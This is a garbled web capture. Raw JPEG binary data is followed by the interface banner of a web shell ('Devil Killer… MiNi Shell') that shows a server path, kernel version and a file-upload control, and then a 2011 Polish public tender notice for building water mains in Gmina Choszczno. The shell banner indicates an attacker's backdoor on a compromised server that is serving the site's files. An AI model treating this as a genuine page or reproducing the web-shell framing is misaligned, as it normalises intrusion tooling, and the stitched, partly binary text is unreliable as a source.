JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/89951-N-2011.html

<p class="kh_header"><b>Choszczno: Budowa wodociągów w Gminie Choszczno na odcinkach Choszczno - Pakość, Pakość - Bonin, Choszczno - Koplin, Piasecznik  - kolonia Piasecznik, Stary Klukom - kolonia Stary Klukom</b><br>
<b>Numer ogłoszenia: 89951 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Choszczno , ul. Wolności 24, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7659300, faks 095 7659306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.choszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wodociągów w Gminie Choszczno na odcinkach Choszczno - Pakość, Pakość - Bonin, Choszczno - Koplin, Piasecznik  - kolonia Piasecznik, Stary Klukom - kolonia Stary Klukom.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje wykonanie następujących robót budowlanych:

-   Roboty rozbiórkowe nawierzchni drogowych, 
-   Roboty ziemne wykonywane mechanicznie i ręcznie,
-   Roboty drogowe - przywrócenie nawierzchni,
-   Roboty branży sanitarnej w zakresie budowy sieci wodociągowej o śr. od 90 do 125 mm, 
 -  Roboty branży sanitarnej w zakresie budowy przyłączy wodociągowych o śr. od 32 do 63 mm
-  Roboty branży budowlanej i sanitarnej związanej  ze zmianą sposobu użytkowania stacji uzdatniania wody na  
   przepompownie strefową wody,
-  zajęcia pasów drogowych i innych nieruchomości w celu wykonania robót,
- roboty geodezyjne związane z obsługą geodezyjną,
- próby szczelności.

1. Zakres rzeczowy operacji  obejmuje:
1.1 ETAP I

Zadanie A - Choszczno-Pakość

a) roboty prowadzone  poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=2050,45 m
- sieć PE Dz 90 mm L=71,17 m
- przyłącza PE Dz 32 mm L=37,79 m

b) roboty prowadzone  w pasie drogi wojewódzkiej
- sieć PE Dz 125 mm L=23,0 m

Zadanie B - Pakość-Bonin

a) roboty prowadzone  poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=2842,1 m
- sieć PE Dz 90 mm L=148,2 m

b) roboty prowadzone  w pasie drogi wojewódzkiej
- sieć PE Dz 125 mm L=44,7 m

1.2. ETAP II

Zadanie C - Choszczno - Koplin etap I

a) roboty prowadzone poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=797,5 m

b) roboty prowadzone w pasie drogi wojewódzkiej
- sieć PE Dz 125 mm L=94 m


Zadanie D - Choszczno - Koplin etap II

a) roboty prowadzone poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=819,7 m

Zadanie E - Choszczno-Koplin etap III

a) roboty prowadzone  poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=5,7 m

a) roboty obiektowe
- zmiana sposobu użytkowania stacji uzdatniania wody na przepompownię strefową wody

Zadanie F - Piasecznik-kolonia Piasecznik 

a) roboty prowadzone poza pasem drogi wojewódzkiej
- sieć PE Dz 125 mm L=571,9 m
- podejścia wodociągowe PE Dz 63 L=3,52 m
- podejścia wodociągowe PE Dz 50 L=1,12 m
- podejścia wodociągowe PE Dz 32 L=26,74 m, 

b) roboty prowadzone w pasie drogi wojewódzkiej
- sieć PE Dz 125 mm L=15,52 m

Zadanie G - Stary Klukom -kolonia Stary Klukom

a) roboty prowadzone  poza pasem drogi wojewódzkiej
- sieć PE Dz 110 mm L=443,3 m
- sieć PE Dz 90 mm L=913,27 m
- podejścia wodociągowe PE Dz 63 L=15,38 m
- podejścia wodociągowe PE Dz 40 L=16,28 m



1.3. Zestawienie łączne długości sieci i podejść wodociągowych (przyłączy)

Sieci wodociągowe
PE Dz 125 mm ; L = 7264,57 m
PE Dz 110 mm ; L= 443,3 m
PE Dz 90 mm ; L= 1132,64 m


Podejścia (przyłącza) wodociągowe 
PE Dz 63 mm ; L = 18,9 m
PE Dz 50 mm ; L= 1,12 m
PE Dz 40 mm ; L= 16,28 m
PE Dz 32 mm ; L= 64,53 m.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych (patrz pkt. 3) w wysokości nie przekraczającej 10% wartości zamówienia podstawowego. Zakres prac uzupełniających polegał będzie na wykonaniu elementów sieci wodociągowej w m. Bonin.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium 
w wysokości 60 000,00 zł (słownie złotych: sześćdziesiąt tysięcy złotych).

Wykonawca może wnieść wadium w  jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
a). 	pieniądzu,
b).	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d).	gwarancjach ubezpieczeniowych,
e).	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy 
z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2007, Nr 42, poz. 275).

Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.

Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego  :
Gospodarczy Bank Spółdzielczy w Choszcznie 40 8359 0005 0028 9098 2000 0003 z dopiskiem w tytule : wadium - dot. Postępowania Budowa wodociągów w Gminie Choszczno na odcinkach Choszczno - Pakość, Pakość - Bonin, Choszczno - Koplin, Piasecznik  - kolonia Piasecznik, Stary Klukom - kolonia Stary Klukom

Wadium w gotówce:
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.




Wadium w innej formie niż gotówka:
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w Urzędzie Miejskim w Choszcznie, ulica Wolności 24 w pokoju nr. 27 razem 
z wypełnionym załącznikiem nr 7 SIWZ Potwierdzenie złożenia wadium  kopię wadium należy dołączyć do oferty.

Brak wniesienia wadium:
Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy 
na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać i udokumentować,  iż wykonał w sposób należyty w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną (inwestycję - inwestycje) obejmującą wykonanie  sieci wodociągowej o średnicy min. 125 mm o długości  nie mniejszej niż  7000 mb i wartości min. 1 400 000 zł 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów 
i oświadczeń wymienionych w pkt 9 SIWZ, metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku w przypadku dysponowania co najmniej jedną: koparką jednonaczyniową , koparko-ładowarką, maszyną do przewiertów sterowanych.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów 
i oświadczeń wymienionych w pkt 9 SIWZ, metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku w przypadku dysponowania  przez Wykonawcę wykwalifikowaną kadrą własną lub udostępnioną na podstawie pisemnego zobowiązania innych podmiotów, niezbędną do kierowania robotami, będącymi przedmiotem zamówienia. Osoby wyznaczone do kierowania robotami w poszczególnych branżach, muszą posiadać wymagane uprawnienia i doświadczenie w kierowaniu robotami w swojej branży:

a). kierownik budowy (robót sanitarnych i technologicznych) z uprawnieniami do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, wentylacyjnych i ciepłowniczych oraz stażem, co najmniej   3- letnim na stanowisku kierownika robót.
b). kierownik robót budowlanych z uprawnieniami do kierowania robotami bez ograniczeń w specjalności konstrukcyjno - budowlanej oraz stażem, co najmniej 3 - letnim na stanowisku kierownika robót.
c). kierownik robót elektrycznych z uprawnieniami do kierowania robotami  bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych oraz stażem, co najmniej 3- letnim na stanowisku kierownika .
Zamawiający wymaga by w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy , w tym okresie  przeciętne roczne zatrudnienie Wykonawcy potwierdzało dysponowanie co najmniej  20 osobami z przygotowaniem do wykonywania przedmiotu zamówienia.  Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów 
i oświadczeń wymienionych w pkt 9 SIWZ, metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku w przypadku gdy wykonawca wykaże iż Uzyskał przychód ze sprzedaży w okresie ostatnich trzech lat obrotowych, a jeżeli okres działalności jest krótszy ( proporcjonalnie do okresu)  w tym okresie 4 000 000,00 zł brutto w każdym roku oraz posiada środki finansowe w wysokości, co najmniej 2 500 000,00  zł lub zdolność kredytową w
wysokości co najmniej  2 500 000,00 zł.
Ponadto Wykonawca winien wykazać , że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 2 000 000,00 zł.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów 
i oświadczeń wymienionych w pkt 9 SIWZ, metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających sie o zamówienie , Wykonawcy ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają wraz z ofertą pełnomocnictwo lub notarialnie poświadczony odpis tego pełnomocnictwa.
W przypadku wyboru jako najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający oświadcza, że przed zawarciem umowy na realizację zamówienia będzie wymagał przedłożenia umowy (cywilnoprawnej) łączącej Wykonawców zawierającej w swej treści:

-	sposób ich współdziałania
-	zakres prac powierzonych do wykonania każdemu z nich,
-	numer i nazwę rachunku bankowego, na który będą dokonywane płatności z tytułu realizacji zamówienia,
-	solidarną odpowiedzialność za należyte wykonanie zamówienia
-	wskazanie wykonawcy upoważnionego do zaciągania zobowiązań i przyjmowania instrukcji na rzecz 
i w imieniu wszystkich wykonawców występujących wspólnie i każdego z osobna oraz do przyjmowania płatności od Zamawiającego.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków wprowadzenia jako roboty dodatkowe lub uzupełniające (art. 67 ust.1 pkt.5 i 6 Pzp), tj.

1.	wynagrodzenie należne wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającego ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego (na dzień wystawienia faktury),
2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
3.	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
